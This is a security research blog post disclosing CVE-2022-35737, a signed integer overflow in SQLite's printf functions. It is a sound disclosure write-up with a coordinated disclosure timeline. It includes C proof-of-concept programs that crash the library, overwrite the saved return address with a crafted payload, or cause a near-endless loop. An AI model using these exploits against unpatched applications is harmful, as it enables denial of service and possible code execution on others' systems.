https://blog.trailofbits.com/2022/10/25/sqlite-vulnerability-july-2022-library-api/ Trail of Bits Blog Menu Skip to content * Home Stranger Strings: An exploitable flaw in SQLite * Post * October 25, 2022 * Leave a comment By Andreas Kellas Trail of Bits is publicly disclosing CVE-2022-35737, which affects applications that use the SQLite library API. CVE-2022-35737 was introduced in SQLite version 1.0.12 (released on October 17, 2000) and fixed in release 3.39.2 (released on July 21, 2022). CVE-2022-35737 is exploitable on 64-bit systems, and exploitability depends on how the program is compiled; arbitrary code execution is confirmed when the library is compiled without stack canaries, but unconfirmed when stack canaries are present, and denial-of-service is confirmed in all cases. On vulnerable systems, CVE-2022-35737 is exploitable when large string inputs are passed to the SQLite implementations of the printf functions and when the format string contains the %Q, %q, or %w format substitution types. This is enough to cause the program to crash. We also show that if the format string contains the ! special character to enable unicode character scanning, then it is possible to achieve arbitrary code execution in the worst case, or to cause the program to hang and loop (nearly) indefinitely. SQLite is used in nearly everything, from naval warships to smartphones to other programming languages. The open-source database engine has a long history of being very secure: many CVEs that are initially pinned to SQLite actually don't impact it at all. This blog post describes the vulnerability and our proof-of-concept exploits, which actually does impact certain versions of SQLite. Although this bug may be difficult to reach in deployed applications, it is a prime example of a vulnerability that is made easier to exploit by "divergent representations" that result from applying compiler optimizations to undefined behavior. In an upcoming blog post, we will show how to find instances of the divergent representations bug in binaries and source code. Background: Stumbling onto a bug A recent blog post presented a vulnerability in PHP that seemed like the perfect candidate for a variant analysis. The blog's bug manifested when a 64-bit unsigned integer string length was implicitly converted into a 32-bit signed integer when passed as an argument to a function. We formulated a variant analysis for this bug class, found a few bugs, and while most of them were banal, one in particular stood out: a function used for properly escaping quote characters in the PHP PDO SQLite module. And thus began our strange journey into SQLite string formatting. SQLite is the most widely deployed database engine, thanks in part to its very permissive licensing and cross-platform, portable design. It is written in C, and can be compiled into a standalone application or a library that exposes APIs for application programmers to use. It seems to be used everywhere--a perception that was reinforced when we tripped right over this vulnerability while hunting for bugs elsewhere. static zend_string* sqlite_handle_quoter(pdo_dbh_t *dbh, const zend_string *unquoted, enum pdo_param_type paramtype) { char *quoted = safe_emalloc(2, ZSTR_LEN(unquoted), 3); /* TODO use %Q format? */ sqlite3_snprintf(2*ZSTR_LEN(unquoted) + 3, quoted, "'%q'", ZSTR_VAL(unquoted)); zend_string *quoted_str = zend_string_init(quoted, strlen(quoted), 0); efree(quoted); return quoted_str; } On line 231, an unsigned long (2*ZSTR_LEN(unquoted) + 3) is passed as the first parameter to sqlite3_snprintf, which expects a signed integer. This felt exciting, and we quickly scripted a simple proof of concept. We expected to be able to exploit this bug to produce a poorly formatted string with mismatched quote characters by passing large strings to the function, and possibly achieve SQL injection in vulnerable applications. Imagine our surprise when our proof of concept crashed the PHP interpreter: [php][php] There's a bug in my bug! We quickly determined that the crash was occurring in the SQLite shared object, so we naturally took a closer look at the sqlite3_snprintf function. SQLite implements custom versions of the printf family of functions and adds the new format specifiers %Q, %q, and %w, which are designed to properly escape quote characters in the input string in order to make safe SQL queries. For example, we wrote the following code snippet to properly use sqlite3_snprintf with the format specifier %q to output a string where all single-quote characters are escaped with another single quote. Additionally, the entire string is wrapped in a leading and trailing single quote, the way the PHP quote function intends: #include #include #include #include int main(int argc, char *argv[]) { char src[] = "hello, \'world\'!"; char dst[sizeof(src) + 4]; // Add 4 to account for extra quotes. sqlite3_snprintf(sizeof(dst), dst, "'%q'", src); printf("src: %s\n", src); printf("dst: %s\n", dst); return 0; } [JFlSpPEseXvmCQRGPnEdZv2Zkv3pSw1Pi38WgjmChwunr88oF5oSKWvseCrv8ke_ghwTTqZ3OV_I_uULb9kFumFmvOp6Jj0MT] [JFlSpPEseXvmCQRGPnEdZv2Zkv3pSw1Pi38WgjmChwunr88oF5oSKWvseCrv8ke_ghwTTqZ3OV_I_uULb9kFumFmvOp6Jj0MT] sqlite3_snprintf properly wraps the original string in single quotes, and escapes any existing single-quotes in the input string. Next, we changed our program to imitate the behavior of the PHP script by passing the same large 2GB string directly to sqlite3_snprintf: #include #include #include #include #define STR_LEN ((0x100000001 - 3) / 2) int main(int argc, char *argv[]) { char *src = calloc(1, STR_LEN + 1); // Account for NULL byte. memset(src, 'a', STR_SIZE); char *dst = calloc(1, STR_LEN + 3); // Account for extra quotes and NULL byte. sqlite3_snprintf(2*STR_LEN + 3, dst, "'%q'", src); printf("src: %s\n", src); printf("dst: %s\n", dst); return 0; } [fish-][fish-] A crash! We seem to have found a culprit: large inputs to sqlite3_snprintf. Thus began a journey down a rabbit hole where we discovered that SQLite does not properly handle large strings in parts of its custom implementations of the printf family of functions. Even further down the rabbit hole, we discovered that a compiler optimization made it easier to exploit the SQLite vulnerability. The Vulnerability The custom SQLite printf family of functions internally calls the function sqlite3_str_vappendf, which handles string formatting. Large string inputs to the sqlite3_str_vappendf function can cause signed integer overflow when the format substitution type is %q, %Q, or %w. sqlite3_str_vappendf scans the input fmt string and formats the variable-sized argument list according to the format substitution types specified in the fmt string. In the case statement for handling the %q, %Q, and %w format specifiers (src/printf.c:L803-850), the function scans the input string for quote characters in order to calculate the correct number of output bytes (lines 824-828) and then copies the input to the output buffer and adds quotation characters as required (lines 842-845). In the snippet below, escarg points to the input string: case etSQLESCAPE: /* %q: Escape ' characters */ case etSQLESCAPE2: /* %Q: Escape ' and enclose in '...' */ case etSQLESCAPE3: { /* %w: Escape " characters */ int i, j, k, n, isnull; int needQuote; char ch; char q = ((xtype==etSQLESCAPE3)?'"':'\''); /* Quote character */ char *escarg; if( bArgList ){ escarg = getTextArg(pArgList); }else{ escarg = va_arg(ap,char*); } isnull = escarg==0; if( isnull ) escarg = (xtype==etSQLESCAPE2 ? "NULL" : "(NULL)"); /* For %q, %Q, and %w, the precision is the number of bytes (or ** characters if the ! flags is present) to use from the input. ** Because of the extra quoting characters inserted, the number ** of output characters may be larger than the precision. */ k = precision; for(i=n=0; k!=0 && (ch=escarg[i])!=0; i++, k--){ if( ch==q ) n++; if( flag_altform2 && (ch&0xc0)==0xc0 ){ while( (escarg[i+1]&0xc0)==0x80 ){ i++; } } } needQuote = !isnull && xtype==etSQLESCAPE2; n += i + 3; if( n>etBUFSIZE ){ bufpt = zExtra = printfTempBuf(pAccum, n); if( bufpt==0 ) return; }else{ bufpt = buf; } j = 0; if( needQuote ) bufpt[j++] = q; k = i; for(i=0; ietBUFSIZE ){ bufpt = zExtra = printfTempBuf(pAccum, n); if( bufpt==0 ) return; }else{ bufpt = buf; } j = 0; if( needQuote ) bufpt[j++] = q; k = i; for(i=0; i #include #include #include #include #include // Offsets relative to sqlite3_str_vappendf stack frame base. Calculated using // the version of libsqlite3.so.0.8.6 provided by apt on Ubuntu 20.04. #define RETADDR_OFFSET 0 #define CANARY_OFFSET 0x40 #define BUF_OFFSET 0x88 #define CANARY 0xbaadd00dbaadd00dull #define ROPGADGET 0xdeadbeefdeadbeefull #define NGADGETS 1 struct payload { uint8_t padding1[BUF_OFFSET-CANARY_OFFSET]; uint64_t canary; uint8_t padding2[CANARY_OFFSET-RETADDR_OFFSET-8]; uint64_t ropchain[NGADGETS]; }__attribute__((packed, aligned(1))); int main(int argc, char *argv[]) { char dst[256]; struct payload p; memset(p.padding1, 'a', sizeof(p.padding1)); p.canary = CANARY; memset(p.padding2, 'b', sizeof(p.padding2)); p.ropchain[0] = ROPGADGET; size_t target_n = 0x80000000; assert(sizeof(p) + 3 <= target_n); size_t n = target_n - sizeof(p) - 3; size_t target_i = 0x100000000 + (sizeof(p) / 2); char *src = calloc(1, target_i); if (!src) { printf("bad allocation\n"); return -1; } size_t cur = 0; memcpy(src, &p, sizeof(p)); cur += sizeof(p); memset(src+cur, '\'', n/2); cur += n/2; assert(cur < 0x7ffffffeul); memset(src+cur, 'c', 0x7ffffffeul-cur); cur += 0x7ffffffeul-cur; src[cur] = '\xc0'; cur++; memset(src+cur, '\x80', target_i - cur); cur = target_i; src[cur-1] = '\0'; sqlite3_snprintf((int) 256, dst, "'%!q'", src); free(src); return 0; } [fish-][fish-] This proof of concept causes the program to crash, but with a SIGABRT rather than a SIGSEGV. This implies that a stack canary was overwritten and that the vulnerable function tried to return. This is in contrast to the earlier crashing proof of concept that crashed before reaching the function return. To confirm that we have successfully controlled the saved return address and stack canary, we can use GDB to view the stack frame before the vulnerable function returns: [Screen-Shot-2022-10-18-at-6][Screen-Shot-2022-10-18-at-6] Executing the proof of concept in a debugger shows that the saved return address is set to 0xdeadbeefdeadbeef. Note that in a non-contrived scenario, a real stack canary will contain a NULL byte, which would defeat the proof of concept above because the NULL byte will cause the string-scanning loop to terminate before the entire payload is copied over the return address. Clever exploitation techniques or specific format string conditions may allow an attacker to bypass this, but our intention is to show that the saved return address can be overwritten. Looping (Nearly) Forever We took our exploitation one step further and developed a proof of concept that uses the divergent representations of the i variable to cause loop [1] to iterate nearly infinitely by incrementing i 2^64 times, which effectively takes forever. This is achieved by causing the inner loop to increment i 2^32 times on every iteration of loop [1], which will also increment 2^32 times. The interesting part of this proof of concept is that it doesn't actually reach the vulnerable integer overflow computation on line 832, but uses only the undefined behavior that results from allowing string inputs larger than what can be represented with 32-bit integers. All that is required is to fill a buffer of 0x100000000 bytes with unicode prefix characters (a single byte of 0xc0 followed by bytes of 0x80), and the loop at [1] will never terminate: #include #include #include #include #include int main(int argc, char *argv[]) { size_t src_buf_size = 0x100000001; char *src = calloc(1, src_buf_size); if (!src) { printf("bad allocation\n"); return -1; } src[0] = '\xc0'; memset(src+1, '\x80', 0xffffffff); char dst[256]; sqlite3_snprintf(256, dst, "'%!q'", src); free(src); return 0; } We showed that CVE-2022-35737 is exploitable when large string inputs are passed to the SQLite implementations of the printf functions and when the format string contains the %Q, %q, or %w format substitution types. This is enough to cause the program to crash. We also showed that if the format string additionally allows for unicode characters by providing the ! character, then it is possible to overwrite the saved return address and to cause the program to loop (nearly) infinitely. But, SQLite is well-tested, right? SQLite is extensively tested with 100% branch test coverage. We discovered this vulnerability despite the tests, which raises the question: how did the tests miss it? SQLite maintains an internal memory limit of 1GB, so the vulnerability is not reachable in the SQLite program. The problem is "defined away" by the notion that SQLite does not support big strings necessary to trigger this vulnerability. However, the C APIs provided by SQLite do not enforce that their inputs adhere to the memory limit, and applications are able to call the vulnerable functions directly. The notion that large strings are unsupported by SQLite is not communicated with the API, so application developers cannot know how to enforce input size limits on these functions. When this code was first written, most processors had 32-bit registers and 4GB of addressable memory, so allocating 1GB strings as input was impractical. Now that 64-bit processors are quite common, allocating such large strings is feasible and the vulnerable conditions are reachable. Unfortunately, this vulnerability is an example of one where extensive branch test coverage does not help, because no new code paths are introduced. 100% branch coverage says that every line of code has been executed, but not how many times. This vulnerability is the result of invalid data that causes code to execute billions of times more than it should. The thoroughness of SQLite's tests is remarkable -- the discovery of this vulnerability should not be taken as a knock on the robustness of the tests. In fact, we wish more projects put as much emphasis on testing as SQLite does. Nonetheless, this bug is evidence that even the best-tested software can have exploitable bugs. Conclusion Not every system or application that uses the SQLite printf functions is vulnerable. For those that are, CVE-2022-35737 is a critical vulnerability that can allow attackers to crash or control programs. The bug has been particularly interesting to analyze, for a few reasons. For one, the inputs required to reach the bug condition are very large, which makes it difficult for traditional fuzzers to reach, and so techniques like static and manual analysis were required to find it. For another, it's a bug that may not have seemed like an error at the time that it was written (dating back to 2000 in the SQLite source code) when systems were primarily 32-bit architectures. And--most interestingly to us at Trail of Bits--its exploitation was made easier by the discovered "divergent representations" of the same source variable, which we explore further in a separate blog post. I'd like to thank my mentor, Peter Goodman, for his expert guidance throughout my summer internship with Trail of Bits. I'd also like to thank Nick Selby for his help in navigating the responsible disclosure process, and all members of the Trail of Bits team who assisted in advising and writing this blog post. Coordinated disclosure July 14, 2022: Reported vulnerability to the Computer Emergency Response Team (CERT) Coordination Center. July 15, 2022: CERT/CC reported vulnerability to SQLite maintainers. July 18, 2022: SQLite maintainers confirmed the vulnerability and fixed it in source code. July 21, 2022: SQLite maintainers released SQLite version 3.39.2 with fix. We would like to thank the teams at SQLite and CERT/CC for working swiftly with us to address these issues. Share this: * Twitter * LinkedIn * Reddit * Telegram * Facebook * Pocket * Email * Print * Like this: Like Loading... By Trail of Bits Posted in Attacks, Internship Projects Post navigation - We do Windows now Leave a Reply Cancel reply Search [ ] [Search] About Us Since 2012, Trail of Bits has helped secure some of the world's most targeted organizations and products. We combine high-end security research with a real world attacker mentality to reduce risk and fortify code. Read more at www.trailofbits.com Subscribe via RSS RSS feed RSS - Posts Recent Posts * Stranger Strings: An exploitable flaw in SQLite * We do Windows now * Porting the Solana eBPF JIT compiler to ARM64 * Working on blockchains as a Trail of Bits intern * Secure your machine learning with Semgrep * It pays to be Circomspect * Magnifier: An Experiment with Interactive Decompilation * Using mutants to improve Slither * The road to the apprenticeship * Shedding smart contract storage with Slither * libmagic: The Blathering * A Typical Day as a Trail of Bits Engineer-Consultant * The Trail of Bits Hiring Process * Managing risk in blockchain deployments * Are blockchains decentralized? Yearly Archive * 2020 * 2019 * 2018 * 2017 * 2016 * 2015 * 2014 * 2013 * 2012 Categories * Apple (13) * Attacks (10) * Audits (1) * Authentication (5) * Binary Ninja (12) * Blockchain (50) * Capture the Flag (11) * Careers (2) * CodeQL (2) * Compilers (23) * Conferences (28) * Containers (2) * Cryptography (39) * Crytic (3) * Cyber Grand Challenge (7) * DARPA (21) * Dynamic Analysis (12) * Education (14) * Empire Hacking (7) * Engineering Practice (12) * Events (5) * Exploits (27) * Fuzzing (29) * Go (4) * Guides (9) * Internship Projects (30) * iVerify (4) * Kubernetes (2) * Linux (1) * Machine Learning (6) * Malware (7) * Manticore (15) * McSema (11) * Meta (12) * Mitigations (9) * osquery (22) * Paper Review (11) * People (1) * Podcast (1) * Press Release (26) * Privacy (9) * Products (5) * Program Analysis (16) * Recruitment (1) * Remote Work (1) * Research Practice (18) * Reversing (14) * Rust (4) * SafeDocs (1) * Sinter (1) * Slither (2) * Sponsorships (12) * Static Analysis (28) * Symbolic Execution (17) * Training (1) * Uncategorized (21) * Working at Trail of Bits (2) * Year in Review (4) * Zero Knowledge (8) My Tweets Loading Comments... Write a Comment... [ ] Email (Required) [ ] Name (Required) [ ] Website [ ] [Post Comment] %d bloggers like this: